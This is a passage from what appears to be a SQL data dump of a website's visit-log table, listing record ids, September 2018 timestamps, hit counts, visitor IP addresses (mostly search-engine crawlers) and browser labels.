,'54.36.148.186','other'),(298609,1536197335,1,1,0,0,'54.36.149.76','other'),(298610,1536197392,1,1,0,0,'66.249.66.73','chrome'),(298611,1536197450,1,1,0,0,'54.36.149.70','other'),(298612,1536197535,1,1,0,0,'66.249.66.27','chrome'),(298613,1536197618,1,1,0,0,'54.36.148.39','other'),(298614,1536197723,1,1,0,0,'54.36.148.168','other'),(298615,1536197923,1,1,0,0,'216.244.66.241','other'),(298616,1536197965,2,2,0,0,'66.249.66.75','chrome'),(298617,1536198020,4,4,0,0,'66.249.66.74','chrome'),(298618,1536198091,1,1,0,0,'54.36.148.14','other'),(298619,1536198132,1,1,0,0,'66.249.66.25','chrome'),(298620,1536198159,1,1,0,0,'54.36.148.184','other'),(298621,1536198163,1,1,0,0,'8.29.198.26','other'),(298622,1536198249,1,1,0,0,'54.36.149.22','other'),(298623,1536198333,1,1,0,0,'54.36.148.92','other'),(298624,1536198407,2,2,0,0,'178.154.171.88','other'),(298625,1536198592,4,4,0,0,'66.249.66.73','chrome'),(298626,1536198711,1,1,0,0,'54.36.149.88','other'),(298627,1536198942,3,3,0,0,'66.249.66.75','chrome'),(298628,1536199011,1,1,0,0,'95.163.255.94','other'),(298629,1536199234,1,1,0,0,'54.36.149.32','other'),(298630,1536199506,1,1,0,0,'66.249.66.25','chrome'),(298631,1536199512,1,1,0,0,'54.36.149.65','other'),(298632,1536199526,1,1,0,0,'66.249.66.73','chrome'),(298633,1536199529,1,1,0,0,'54.36.148.87','other'),(298634,1536199549,5,5,0,0,'66.249.66.74','chrome'),(298635,1536199732,1,1,0,0,'54.36.148.221','other'),(298636,1536199825,1,1,0,0,'54.36.148.227','other'),(298637,1536199883,1,1,0,0,'54.36.148.116','other'),(298638,1536200369,1,1,0,0,'54.36.148.213','other'),(298639,1536200374,1,1,0,0,'54.36.148.86','other'),(298640,1536200590,2,2,0,0,'66.249.66.75','chrome'),(298641,1536200743,1,1,0,0,'46.4.67.206','other'),(298642,1536200762,1,1,0,0,'178.154.171.88','other'),(298643,1536200763,1,1,0,0,'54.36.149.14','other'),(298644,1536200784,1,1,0,0,'54.36.149.100','other'),(298645,1536200807,1,1,0,0,'54.36.148.130','other'),(298646,1536200899,1,1,0,0,'54.36.148.219','other'),(298647,1536200963,1,1,0,0,'54.36.148.114','other'),(298648,1536201027,1,1,0,0,'54.36.148.117','other'),(298649,1536201074,1,1,0,0,'54.36.148.11','other'),(298650,1536201078,1,1,0,0,'54.36.148.85','other'),(298651,1536201111,1,1,0,0,'54.36.148.64','other'),(298652,1536201154,1,1,0,0,'66.249.66.25','chrome'),(298653,1536201237,1,1,0,0,'40.77.167.71','other'),(298654,1536201256,1,1,0,0,'54.36.148.134','other'),(298655,1536201491,5,5,0,0,'66.249.66.74','chrome'),(298656,1536201511,3,3,0,0,'66.249.66.73','chrome'),(298657,1536201601,1,1,0,0,'54.36.149.99','other'),(298658,1536201838,61,61,0,0,'178.63.82.50','other'),(298659,1536201878,1,1,0,0,'66.249.66.76','chrome'),(298660,1536202331,2,2,0,0,'66.249.66.26','chrome'),(298661,1536202647,1,1,0,0,'54.36.148.132','other'),(298662,1536202855,1,1,0,0,'66.249.66.73','chrome'),(298663,1536203127,1,1,0,0,'52.41.211.72','chrome'),(298664,1536203247,1,1,0,0,'178.154.171.88','other'),(298665,1536203251,1,1,0,0,'54.36.148.55','other'),(298666,1536203275,1,1,0,0,'54.36.148.230','other'),(298667,1536203356,1,1,0,0,'54.36.148.176','other'),(298668,1536203399,5,5,0,0,'66.249.66.74','chrome'),(298669,1536203405,2,2,0,0,'66.249.66.26','chrome'),(298670,1536203406,1,1,0,0,'54.36.148.69','other'),(298671,1536203423,1,1,0,0,'54.36.149.5','other'),(298672,1536203520,1,1,0,0,'216.244.66.241','other'),(298673,1536203666,1,1,0,0,'54.36.148.216','other'),(298674,1536203915,2,2,0,0,'66.249.66.25','chrome'),(298675,1536203986,15,15,0,0,'66.249.66.73','chrome'),(298676,1536204027,1,1,0,0,'54.36.148.209','other'),(298677,1536204029,1,1,0,0,'54.36.148.212','other'),(298678,1536204060,4,4,0,0,'66.249.66.75','chrome'),(298679,1536204163,1,1,0,0,'207.46.13.64','other'),(298680,1536204165,1,1,0,0,'40.77.167.123','other'),(298681,1536204486,1,1,0,0,'54.36.149.37','other'),(298682,1536204504,1,1,0,0,'66.249.66.76','chrome'),(298683,1536204738,1,1,0,0,'54.36.148.78','other'),(298684,1536204874,1,1,0,0,'62.109.19.86','chrome'),(298685,1536205119,1,1,0,0,'54.36.149.86','other'),(298686,1536205277,1,1,0,0,'54.36.149.64','other'),(298687,1536205291,1,1,0,0,'40.77.167.123','other'),(298688,1536205303,17,17,0,0,'66.249.66.73','chrome'),(298689,1536205329,5,5,0,0,'66.249.66.75','chrome'),(298690,1536205332,7,7,0,0,'66.249.66.74','chrome'),(298691,1536205376,1,1,0,0,'54.36.148.232','other'),(298692,1536205417,1,1,0,0,'54.36.148.246','other'),(298693,1536205418,1,1,0,0,'54.36.148.101','other'),(298694,1536205541,1,1,0,0,'54.36.148.110','other'),(298695,1536205554,2,2,0,0,'66.249.66.27','chrome'),(298696,1536205555,1,1,0,0,'54.36.148.233','other'),(298697,1536205566,3,3,0,0,'66.249.66.25','chrome'),(298698,1536205625,1,1,0,0,'54.36.149.56','other'),(298699,1536205637,1,1,0,0,'54.36.148.76','other'),(298700,1536205703,1,1,0,0,'54.36.148.144','other'),(298701,1536205745,2,2,0,0,'66.249.66.26','chrome'),(298702,1536205761,1,1,0,0,'54.36.148.248','other'),(298703,1536205996,2,2,0,0,'141.8.142.74','other'),(298704,1536206029,2,2,0,0,'178.154.171.88','other'),(298705,1536206051,1,1,0,0,'54.36.149.76','other'),(298706,1536206055,1,1,0,0,'216.244.66.241','other'),(298707,1536206180,1,1,0,0,'54.36.148.197','other'),(298708,1536206182,2,2,0,0,'54.36.148.203','other'),(298709,1536206203,1,1,0,0,'54.36.149.68','other'),(298710,1536206278,1,1,0,0,'54.36.149.48','other'),(298711,1536206394,1,0,1,0,'66.249.66.73',''),(298712,1536206598,1,1,0,0,'54.36.148.160','other'),(298713,1536206662,1,1,0,0,'54.36.148.157','other'),(298714,1536206975,1,1,0,0,'54.36.148.28','other'),(298715,1536207195,1,1,0,0,'95.163.255.96','other'),(298716,1536207471,1,1,0,0,'54.36.148.18','other'),(298717,1536207561,2,2,0,0,'216.244.66.241','other'),(298718,1536207599,1,1,0,0,'54.36.148.222','other'),(298719,1536207600,1,1,0,0,'66.249.66.73','chrome'),(298720,1536207658,1,1,0,0,'54.36.149.29','other'),(298721,1536207767,1,1,0,0,'40.77.167.71','other'),(298722,1536207883,1,1,0,0,'141.8.142.74','other'),(298723,1536208315,1,1,0,0,'54.36.149.107','other'),(298724,1536208342,2,2,0,0,'54.36.149.14','other'),(298725,1536208377,1,1,0,0,'54.36.149.31','other'),(298726,1536208458,1,1,0,0,'54.36.148.153','other'),(298727,1536208505,1,1,0,0,'178.154.171.88','other'),(298728,1536208559,1,1,0,0,'54.36.148.190','other'),(298729,1536209008,1,1,0,0,'66.249.66.73','chrome'),(298730,1536209012,1,1,0,0,'8.29.198.26','other'),(298731,1536209177,4,4,0,0,'66.249.66.74','chrome'),(298732,1536209181,1,1,0,0,'54.36.148.75','other'),(298733,1536209292,1,1,0,0,'54.36.148.121','other'),(298734,1536209293,1,1,0,0,'54.36.148.116','other'),(298735,1536209324,1,1,0,0,'54.36.148.126','other'),(298736,1536209371,1,1,0,0,'54.36.148.135','other'),(298737,1536209429,1,1,0,0,'207.46.13.64','other'),(298738,1536209516,1,1,0,0,'54.36.149.82','other'),(298739,1536209712,2,2,0,0,'62.210.101.101','other'),(298740,1536209816,1,1,0,0,'54.36.148.82','other'),(298741,1536210049,3,3,0,0,'66.249.66.73','chrome'),(298742,1536210161,1,1,0,0,'54.36.148.153','other'),(298743,1536210176,2,1,1,0,'66.249.66.75',''),(298744,1536210278,1,1,0,0,'54.36.148.137','other'),(298745,1536210340,2,2,0,0,'54.36.148.124','other'),(298746,1536210426,1,1,0,0,'141.8.142.74','other'),(298747,1536210444,1,1,0,0,'54.36.149.103','other'),(298748,1536210481,1,1,0,0,'66.249.66.74','chrome'),(298749,1536210727,1,1,0,0,'54.36.148.115','other'),(298750,1536210874,1,1,0,0,'54.36.149.63','other'),(298751,1536210876,2,2,0,0,'91.196.177.46','chrome'),(298752,1536211107,1,1,0,0,'54.36.148.195','other'),(298753,1536211252,1,1,0,0,'54.36.148.36','other'),(298754,1536211397,1,1,0,0,'178.154.171.88','other'),(298755,1536211442,1,1,0,0,'54.36.149.90','other'),(298756,1536211595,1,1,0,0,'54.36.148.148','other'),(298757,1536211663,1,1,0,0,'54.36.148.71','other'),(298758,1536211830,1,1,0,0,'54.36.149.39','other'),(298759,1536211897,2,2,0,0,'66.249.66.75','chrome'),(298760,1536211908,1,1,0,0,'66.249.66.25','chrome'),(298761,1536212146,1,1,0,0,'54.36.148.33','other'),(298762,1536212413,1,1,0,0,'178.154.171.88','other'),(298763,1536212574,1,1,0,0,'95.132.21.232','other'),(298764,1536212584,1,1,0,0,'54.36.148.81','other'),(298765,1536212748,1,1,0,0,'54.36.148.14','other'),(298766,1536212825,1,1,0,0,'66.249.66.74','chrome'),(298767,1536212880,1,1,0,0,'216.244.66.241','other'),(298768,1536212935,1,1,0,0,'54.36.149.89','other'),(298769,1536213081,1,1,0,0,'54.36.148.37','other'),(298770,1536213107,1,1,0,0,'66.249.66.75','chrome'),(298771,1536213237,1,1,0,0,'54.36.148.86','other'),(298772,1536213309,2,2,0,0,'54.36.148.255','other'),(298773,1536213533,1,1,0,0,'54.36.148.206','other'),(298774,1536213588,1,1,0,0,'54.36.148.247','other'),(298775,1536213596,1,1,0,0,'54.36.149.60','other'),(298776,1536213882,1,1,0,0,'66.249.66.74','chrome'),(298777,1536213888,5,4,1,0,'66.249.66.73',''),(298778,1536213889,1,1,0,0,'54.36.148.81','other'),(298779,1536213957,1,1,0,0,'54.36.148.217','other'),(298780,1536214076,1,1,0,0,'91.196.178.85','firefox'),(298781,1536214269,1,1,0,0,'54.36.148.225','other'),(298782,1536214381,1,1,0,0,'54.36.148.37','other'),(298783,1536214418,1,1,0,0,'54.36.148.30','other'),(298784,1536214793,1,1,0,0,'54.36.149.56','other'),(298785,1536214892,1,1,0,0,'54.36.148.61','other'),(298786,1536214929,1,1,0,0,'54.36.149.24','other'),(298787,1536214979,1,1,0,0,'91.196.178.85','chrome'),(298788,1536215011,1,1,0,0,'54.36.149.11','other'),(298789,1536215050,2,2,0,0,'66.249.66.74','chrome'),(298790,1536215088,1,1,0,0,'51.255.65.46','other'),(298791,1536215107,1,1,0,0,'54.36.149.57','other'),(298792,1536215244,1,1,0,0,'54.36.149.32','other'),(298793,1536215381,1,1,0,0,'54.36.148.198','other'),(298794,1536215404,2,2,0,0,'66.249.66.75','chrome'),(298795,1536215479,1,1,0,0,'54.36.148.79','other'),(298796,1536215493,1,1,0,0,'54.36.148.78','other'),(298797,1536215553,1,1,0,0,'54.36.148.164','other'),(298798,1536215616,1,1,0,0,'54.36.148.158','other'),(298799,1536215826,1,1,0,0,'5.53.116.12','chrome'),(298800,1536215986,1,1,0,0,'54.36.148.51','other'),(298801,1536216176,3,3,0,0,'66.249.66.74','chrome'),(298802,1536216198,1,1,0,0,'54.36.148.42','other'),(298803,1536216272,1,1,0,0,'54.36.149.47','other'),(298804,1536216283,5,5,0,0,'66.249.66.73','chrome'),(298805,1536216353,1,1,0,0,'54.36.148.105','other'),(298806,1536216364,1,1,0,0,'54.36.149.101','other'),(298807,1536216460,1,1,0,0,'66.249.66.75','chrome'),(298808,1536216618,1,1,0,0,'66.249.66.27','chrome'),(298809,1536216764,1,1,0,0,'54.36.148.47','other'),(298810,1536216772,1,1,0,0,'54.36.149.79','other'),(298811,1536216822,1,1,0,0,'54.36.148.85','other'),(298812,1536216858,1,1,0,0,'141.8.142.74','other'),(298813,1536216962,1,1,0,0,'54.36.149.77','other'),(298814,1536217314,1,1,0,0,'5.53.116.12','firefox'),(298815,1536217383,4,4,0,0,'66.249.66.73','chrome'),(298816,1536217511,1,1,0,0,'66.249.66.25','chrome'),(298817,1536217534,1,1,0,0,'54.36.148.37','other'),(298818,1536217643,1,1,0,0,'54.36.148.205','other'),(298819,1536217684,2,2,0,0,'188.163.5.16','chrome'),(298820,1536217716,2,2,0,0,'66.249.66.74','chrome'),(298821,1536217797,3,3,0,0,'66.249.66.75','chrome'),(298822,1536217876,1,1,0,0,'54.36.149.17','other'),(298823,1536217903,1,1,0,0,'162.210.196.100','other'),(298824,1536217956,1,1,0,0,'216.244.66.241','other'),(298825,1536218223,1,1,0,0,'54.36.149.43','other'),(298826,1536218324,1,1,0,0,'54.36.149.98','other'),(298827,1536218383,1,1,0,0,'54.36.148.64','other'),(298828,1536218435,1,1,0,0,'54.36.148.24','other'),(298829,1536218658,1,1,0,0,'54.36.148.10','other'),(298830,1536218709,1,1,0,0,'54.36.148.22','other'),(298831,1536218799,3,3,0,0,'91.196.178.91','chrome'),(298832,1536218860,1,1,0,0,'141.8.142.74','other'),(298833,1536219074,1,1,0,0,'94.179.147.128','chrome'),(298834,1536219154,5,5,0,0,'66.249.66.73','chrome'),(298835,1536219316,1,1,0,0,'54.36.149.96','other'),(298836,1536219502,1,1,0,0,'54.36.148.158','other'),(298837,1536219711,1,1,0,0,'91.196.178.91','chrome'),(298838,1536219800,1,1,0,0,'54.36.148.250','other'),(298839,1536219838,6,6,0,0,'66.249.66.74','chrome'),(298840,1536219843,3,3,0,0,'66.249.66.75','chrome'),(298841,1536219860,1,1,0,0,'8.29.198.25','other'),(298842,1536219902,1,1,0,0,'54.36.148.115','other'),(298843,1536220029,1,1,0,0,'54.36.148.199','other'),(298844,1536220104,1,1,0,0,'66.249.66.27','chrome'),(298845,1536220108,1,1,0,0,'91.124.182.170','firefox'),(298846,1536220272,1,1,0,0,'54.36.149.56','other'),(298847,1536220459,3,3,0,0,'66.249.66.73','chrome'),(298848,1536220512,1,1,0,0,'54.36.148.141','other'),(298849,1536220651,1,1,0,0,'66.249.66.25','chrome'),(298850,1536220716,1,1,0,0,'54.36.148.54','other'),(298851,1536220738,1,1,0,0,'54.36.149.26','other'),(298852,1536220845,1,1,0,0,'66.249.66.74','chrome'),(298853,1536220853,1,1,0,0,'54.36.148.178','other'),(298854,1536220938,17,17,0,0,'144.76.120.197','other'),(298855,1536221360,1,1,0,0,'54.36.149.62','other'),(298856,1536221404,1,1,0,0,'54.36.149.41','other'),(298857,1536221523,1,1,0,0,'54.36.148.92','other'),(298858,1536221525,1,1,0,0,'66.249.66.75','chrome'),(298859,1536221572,1,1,0,0,'54.36.149.21','other'),(298860,1536221693,1,1,0,0,'207.46.13.64','other'),(298861,1536221867,1,1,0,0,'54.36.148.240','other'),(298862,1536222008,1,1,0,0,'66.249.66.27','chrome'),(298863,1536222085,1,1,0,0,'54.36.148.68','other'),(298864,1536222270,1,1,0,0,'54.36.149.18','other'),(298865,1536222537,1,1,0,0,'95.132.43.32','firefox'),(298866,1536222650,2,2,0,0,'66.249.66.74','chrome'),(298867,1536222683,1,1,0,0,'66.249.66.73','chrome'),(298868,1536222735,1,1,0,0,'54.36.148.58','other'),(298869,1536222926,1,1,0,0,'54.36.148.80','other'),(298870,1536222971,1,1,0,0,'54.36.148.214','other'),(298871,1536222973,1,1,0,0,'54.36.149.69','other'),(298872,1536223222,1,1,0,0,'178.94.252.148','chrome'),(298873,1536223530,1,1,0,0,'54.36.149.40','other'),(298874,1536223533,1,1,0,0,'54.36.149.32','other'),(298875,1536223590,1,1,0,0,'91.196.178.135','firefox'),(298876,1536223674,2,1,1,0,'66.249.66.74',''),(298877,1536223706,3,3,0,0,'66.249.66.75','chrome'),(298878,1536223775,10,10,0,0,'66.249.66.73','chrome'),(298879,1536223816,1,1,0,0,'216.244.66.241','other'),(298880,1536223990,1,0,1,0,'66.249.66.25',''),(298881,1536224151,1,1,0,0,'54.36.149.7','other'),(298882,1536224298,3,3,0,0,'66.249.66.74','chrome'),(298883,1536224340,1,1,0,0,'77.111.247.54','chrome'),(298884,1536224650,1,1,0,0,'54.36.148.111','other'),(298885,1536224696,1,1,0,0,'91.196.178.89','chrome'),(298886,1536224854,1,1,0,0,'54.36.148.236','other'),(298887,1536224951,1,1,0,0,'141.8.142.74','other'),(298888,1536225042,1,1,0,0,'54.36.149.95','other'),(298889,1536225226,3,3,0,0,'66.249.66.75','chrome'),(298890,1536225428,1,1,0,0,'54.36.149.79','other'),(298891,1536225541,1,1,0,0,'54.36.148.27','other'),(298892,1536225559,1,1,0,0,'95.132.21.48','chrome'),(298893,1536225589,1,1,0,0,'91.196.178.171','chrome'),(298894,1536225607,5,5,0,0,'66.249.66.73','chrome'),(298895,1536225649,1,1,0,0,'54.36.149.90','other'),(298896,1536225661,1,1,0,0,'54.36.148.74','other'),(298897,1536225827,1,1,0,0,'54.36.148.72','other'),(298898,1536225867,2,2,0,0,'141.8.142.74','other'),(298899,1536225886,1,1,0,0,'54.36.148.105','other'),(298900,1536225998,1,1,0,0,'54.36.148.94','other'),(298901,1536226193,1,1,0,0,'216.244.66.241','other'),(298902,1536226216,1,1,0,0,'54.36.148.233','other'),(298903,1536226404,1,1,0,0,'54.36.148.151','other'),(298904,1536226491,3,3,0,0,'66.249.66.74','chrome'),(298905,1536226522,10,10,0,0,'66.249.66.73','chrome'),(298906,1536226578,1,1,0,0,'54.36.148.50','other'),(298907,1536226623,1,1,0,0,'66.249.66.26','chrome'),(298908,1536226657,1,1,0,0,'66.249.66.25','chrome'),(298909,1536226677,1,1,0,0,'87.250.224.46','other'),(298910,1536226730,1,1,0,0,'178.154.171.88','other'),(298911,1536226818,1,1,0,0,'54.36.149.27','other'),(298912,1536226920,1,1,0,0,'54.36.148.105','other'),(298913,1536226957,1,1,0,0,'54.36.149.43','other'),(298914,1536227015,1,1,0,0,'54.36.148.11','other'),(298915,1536227316,1,1,0,0,'54.36.148.56','other'),(298916,1536227362,1,1,0,0,'54.36.148.255','other'),(298917,1536227519,1,1,0,0,'92.113.189.235','chrome'),(298918,1536227559,1,1,0,0,'31.13.115.11','other'),(298919,1536227568,1,1,0,0,'54.36.148.240','other'),(298920,1536227579,1,1,0,0,'66.220.149.29','other'),(298921,1536227601,1,1,0,0,'54.36.148.159','other'),(298922,1536227623,1,1,0,0,'141.8.142.74','other'),(298923,1536227698,4,4,0,0,'66.249.66.73','chrome'),(298924,1536227711,1,1,0,0,'91.124.182.170','chrome'),(298925,1536227783,1,1,0,0,'194.187.170.125','other'),(298926,1536227824,4,4,0,0,'66.249.66.74','chrome'),(298927,1536227863,1,1,0,0,'54.36.148.228','other'),(298928,1536227893,1,1,0,0,'54.36.148.194','other'),(298929,1536227895,1,1,0,0,'91.196.177.46','chrome'),(298930,1536227916,1,1,0,0,'54.36.149.87','other'),(298931,1536228123,1,1,0,0,'54.36.148.17','other'),(298932,1536228175,2,2,0,0,'216.244.66.241','other'),(298933,1536228190,1,1,0,0,'54.36.148.225','other'),(298934,1536228220,1,1,0,0,'91.124.182.170','firefox'),(298935,1536228268,2,2,0,0,'66.249.66.75','chrome'),(298936,1536228550,1,1,0,0,'31.13.115.10','other'),(298937,1536228580,1,1,0,0,'54.36.148.160','other'),(298938,1536228595,1,1,0,0,'40.77.167.71','other'),(298939,1536228605,1,1,0,0,'141.8.142.74','other'),(298940,1536228922,1,1,0,0,'54.36.149.103','other'),(298941,1536228924,1,1,0,0,'91.196.177.110','chrome'),(298942,1536229060,1,1,0,0,'54.36.148.153','other'),(298943,1536229224,1,1,0,0,'95.163.255.98','other'),(298944,1536229407,1,1,0,0,'66.249.66.75','chrome'),(298945,1536229488,1,1,0,0,'54.36.148.249','other'),(298946,1536229517,1,1,0,0,'91.196.178.169','chrome'),(298947,1536229527,1,1,0,0,'54.36.149.65','other'),(298948,1536229563,1,1,0,0,'91.196.178.162','chrome'),(298949,1536229583,4,4,0,0,'141.8.142.74','other'),(298950,1536229599,4,4,0,0,'66.249.66.74','chrome'),(298951,1536229692,2,2,0,0,'5.9.141.8','other'),(298952,1536229720,3,3,0,0,'66.249.66.73','chrome'),(298953,1536229812,1,1,0,0,'54.36.148.50','other'),(298954,1536229957,1,1,0,0,'194.187.170.125','other'),(298955,1536229974,1,1,0,0,'54.36.148.43','other'),(298956,1536230017,1,1,0,0,'66.249.66.25','chrome'),(298957,1536230060,1,1,0,0,'54.36.149.79','other'),(298958,1536230347,1,1,0,0,'54.165.59.7','other'),(298959,1536230463,1,1,0,0,'54.36.148.42','other'),(298960,1536230715,1,1,0,0,'8.29.198.26','other'),(298961,1536230777,1,1,0,0,'54.36.148.10','other'),(298962,1536230987,1,1,0,0,'54.36.148.107','other'),(298963,1536231116,4,4,0,0,'66.249.66.74','chrome'),(298964,1536231424,1,1,0,0,'54.36.148.160','other'),(298965,1536231439,1,1,0,0,'54.36.148.55','other'),(298966,1536231490,1,1,0,0,'54.36.148.51','other'),(298967,1536231543,3,3,0,0,'66.249.66.75','chrome'),(298968,1536231644,1,1,0,0,'54.36.149.25','other'),(298969,1536231995,1,1,0,0,'141.8.142.74','other'),(298970,1536231999,3,3,0,0,'66.249.66.73','chrome'),(298971,1536232023,1,1,0,0,'66.249.66.74','chrome'),(298972,1536232027,1,1,0,0,'54.36.148.114','other'),(298973,1536232239,1,1,0,0,'54.36.148.197','other'),(298974,1536232281,1,1,0,0,'54.36.148.168','other'),(298975,1536232313,1,1,0,0,'66.249.81.198','chrome'),(298976,1536232374,1,1,0,0,'78.111.189.94','chrome'),(298977,1536232419,1,1,0,0,'54.36.148.224','other'),(298978,1536232452,1,1,0,0,'54.36.148.63','other'),(298979,1536232484,1,1,0,0,'54.36.148.11','other'),(298980,1536232510,1,1,0,0,'54.36.148.67','other'),(298981,1536232646,1,1,0,0,'77.222.153.241','chrome'),(298982,1536232793,1,1,0,0,'54.36.148.222','other'),(298983,1536232970,1,1,0,0,'178.154.171.88','other'),(298984,1536233002,2,2,0,0,'141.8.142.74','other'),(298985,1536233036,5,5,0,0,'66.249.66.73','chrome'),(298986,1536233247,1,1,0,0,'91.196.178.85','chrome'),(298987,1536233321,4,4,0,0,'66.249.66.74','chrome'),(298988,1536233369,1,1,0,0,'54.36.149.76','other'),(298989,1536233394,1,1,0,0,'91.196.178.89','chrome'),(298990,1536233443,1,1,0,0,'54.36.148.41','other'),(298991,1536233608,1,1,0,0,'66.249.66.75','chrome'),(298992,1536233809,1,1,0,0,'109.207.193.98','chrome'),(298993,1536233960,1,1,0,0,'54.36.149.26','other'),(298994,1536234026,1,1,0,0,'52.53.201.78','chrome'),(298995,1536234043,2,2,0,0,'141.8.142.74','other'),(298996,1536234117,1,1,0,0,'178.154.200.41','other'),(298997,1536234399,5,5,0,0,'148.251.244.137','other'),(298998,1536234630,2,2,0,0,'66.249.66.73','chrome'),(298999,1536234696,1,1,0,0,'91.196.178.89','chrome'),(299000,1536234962,1,1,0,0,'54.36.148.241','other'),(299001,1536235123,1,1,0,0,'54.36.148.237','other'),(299002,1536235173,1,1,0,0,'54.36.148.154','other'),(299003,1536235182,4,4,0,0,'66.249.66.74','chrome'),(299004,1536235272,1,1,0,0,'37.54.125.100','chrome'),(299005,1536235484,1,1,0,0,'185.220.101.29','chrome'),(299006,1536235588,1,1,0,0,'91.196.178.85','chrome'),(299007,1536235608,1,1,0,0,'54.36.149.30','other'),(299008,1536235683,1,0,1,0,'66.249.66.73',''),(299009,1536235825,1,1,0,0,'54.36.148.60','other'),(299010,1536235890,2,2,0,0,'178.154.171.88','other'),(299011,1536235924,1,1,0,0,'54.36.148.90','other'),(299012,1536236149,1,1,0,0,'87.250.224.46','other'),(299013,1536236217,2,2,0,0,'66.249.66.75','chrome'),(299014,1536236383,1,1,0,0,'54.36.149.66','other'),(299015,1536236791,1,1,0,0,'54.36.149.78','other'),(299016,1536236834,3,3,0,0,'141.8.142.74','other'),(299017,1536236890,2,2,0,0,'66.249.66.74','chrome'),(299018,1536236931,1,1,0,0,'54.36.148.140','other'),(299019,1536236940,1,1,0,0,'178.154.171.88','other'),(299020,1536237250,1,1,0,0,'66.249.66.75','chrome'),(299021,1536237280,1,1,0,0,'66.249.66.73','chrome'),(299022,1536237570,1,1,0,0,'54.36.149.72','other'),(299023,1536237592,1,1,0,0,'130.180.220.77','chrome'),(299024,1536237771,4,4,0,0,'141.8.142.74','other'),(299025,1536237995,1,1,0,0,'54.36.148.202','other'),(299026,1536238045,1,1,0,0,'54.36.149.51','other'),(299027,1536238338,1,1,0,0,'54.36.148.48','other'),(299028,1536238420,1,1,0,0,'54.36.148.94','other'),(299029,1536238426,2,2,0,0,'66.249.66.74','chrome'),(299030,1536238494,1,1,0,0,'54.36.149.24','other'),(299031,1536238516,6,6,0,0,'66.249.66.73','chrome'),(299032,1536238544,17,17,0,0,'207.46.13.64','other'),(299033,1536238565,1,1,0,0,'54.36.149.90','other'),(299034,1536238603,1,1,0,0,'54.36.148.26','other'),(299035,1536238795,1,1,0,0,'91.196.178.93','chrome'),(299036,1536239005,1,1,0,0,'46.201.174.243','chrome'),(299037,1536239046,1,1,0,0,'178.154.171.88','other'),(299038,1536239078,1,1,0,0,'141.8.142.74','other'),(299039,1536239101,1,1,0,0,'216.244.66.241','other'),(299040,1536239248,12,12,0,0,'40.77.167.123','other'),(299041,1536239282,14,14,0,0,'40.77.167.71','other'),(299042,1536239314,10,10,0,0,'157.55.39.212','other'),(299043,1536239384,3,3,0,0,'66.249.66.74','chrome'),(299044,1536239500,1,1,0,0,'66.249.66.73','chrome'),(299045,1536239742,1,1,0,0,'54.36.148.96','other'),(299046,1536239864,1,1,0,0,'54.36.148.101','other'),(299047,1536239869,1,1,0,0,'54.36.148.113','other'),(299048,1536240067,1,1,0,0,'54.36.149.106','other'),(299049,1536240143,1,1,0,0,'141.8.142.74','other'),(299050,1536240225,1,1,0,0,'54.36.148.209','other'),(299051,1536240239,1,1,0,0,'54.36.148.71','other'),(299052,1536240264,1,1,0,0,'91.196.177.176','chrome'),(299053,1536240319,1,1,0,0,'37.53.78.79','chrome'),(299054,1536240329,1,1,0,0,'54.36.148.170','other'),(299055,1536240622,1,1,0,0,'54.36.149.27','other'),(299056,1536240725,1,1,0,0,'54.36.148.19','other'),(299057,1536240781,1,1,0,0,'69.171.251.29','other'),(299058,1536240988,1,1,0,0,'66.249.66.27','chrome'),(299059,1536241012,1,1,0,0,'91.196.179.134','chrome'),(299060,1536241088,1,1,0,0,'66.249.66.74','chrome'),(299061,1536241105,2,2,0,0,'54.36.148.173','other'),(299062,1536241124,1,1,0,0,'216.244.66.241','other'),(299063,1536241149,1,1,0,0,'66.249.66.26','chrome'),(299064,1536241150,1,1,0,0,'54.36.148.103','other'),(299065,1536241271,1,1,0,0,'54.36.148.114','other'),(299066,1536241314,1,1,0,0,'54.36.149.83','other'),(299067,1536241376,1,1,0,0,'54.36.148.168','other'),(299068,1536241557,1,1,0,0,'8.29.198.27','other'),(299069,1536241638,1,1,0,0,'141.8.142.74','other'),(299070,1536241752,1,1,0,0,'185.191.204.6','chrome'),(299071,1536241807,3,3,0,0,'66.249.66.75','chrome'),(299072,1536242044,1,1,0,0,'54.36.149.100','other'),(299073,1536242436,2,2,0,0,'66.249.66.74','chrome'),(299074,1536242513,3,3,0,0,'66.249.66.73','chrome'),(299075,1536242664,1,1,0,0,'54.36.149.3','other'),(299076,1536242724,1,1,0,0,'54.36.148.128','other'),(299077,1536242790,1,1,0,0,'62.205.134.182','firefox'),(299078,1536242802,1,1,0,0,'77.123.139.187','other'),(299079,1536242804,1,1,0,0,'88.99.97.146','other'),(299080,1536242816,1,1,0,0,'54.36.148.25','other'),(299081,1536242983,1,1,0,0,'54.36.148.168','other'),(299082,1536243001,2,2,0,0,'66.249.66.75','chrome'),(299083,1536243030,1,1,0,0,'54.36.148.112','other'),(299084,1536243254,1,1,0,0,'54.36.148.255','other'),(299085,1536243301,1,1,0,0,'54.36.148.229','other'),(299086,1536243507,1,1,0,0,'54.36.148.167','other'),(299087,1536243661,1,0,1,0,'66.249.66.74',''),(299088,1536243688,1,1,0,0,'54.36.148.198','other'),(299089,1536243727,1,1,0,0,'40.77.167.123','other'),(299090,1536243908,1,1,0,0,'54.36.148.132','other'),(299091,1536244057,1,1,0,0,'54.36.148.156','other'),(299092,1536244107,2,2,0,0,'66.249.66.74','chrome'),(299093,1536244200,1,1,0,0,'62.205.134.182','firefox'),(299094,1536244223,1,1,0,0,'77.123.139.187','other'),(299095,1536244504,2,2,0,0,'66.249.66.73','chrome'),(299096,1536244696,1,1,0,0,'66.249.66.75','chrome'),(299097,1536244959,1,1,0,0,'54.36.149.33','other'),(299098,1536245218,1,1,0,0,'207.46.13.64','other'),(299099,1536245548,1,1,0,0,'54.36.148.96','other'),(299100,1536245685,2,2,0,0,'66.249.66.74','chrome'),(299101,1536245723,1,1,0,0,'54.36.148.139','other'),(299102,1536245728,1,1,0,0,'54.36.149.90','other'),(299103,1536245764,1,1,0,0,'66.249.66.75','chrome'),(299104,1536245857,1,1,0,0,'54.36.148.251','other'),(299105,1536246005,1,1,0,0,'54.36.148.143','other'),(299106,1536246137,4,4,0,0,'66.249.66.73','chrome'),(299107,1536246176,1,1,0,0,'54.36.148.18','other'),(299108,1536246344,1,1,0,0,'54.36.148.103','other'),(299109,1536246385,1,1,0,0,'40.77.167.71','other'),(299110,1536246388,1,1,0,0,'66.249.66.25','chrome'),(299111,1536246605,1,1,0,0,'62.205.134.182','firefox'),(299112,1536246624,1,1,0,0,'77.123.139.187','other'),(299113,1536246640,1,1,0,0,'199.30.231.1','chrome'),(299114,1536246642,1,1,0,0,'66.102.9.24','chrome'),(299115,1536246933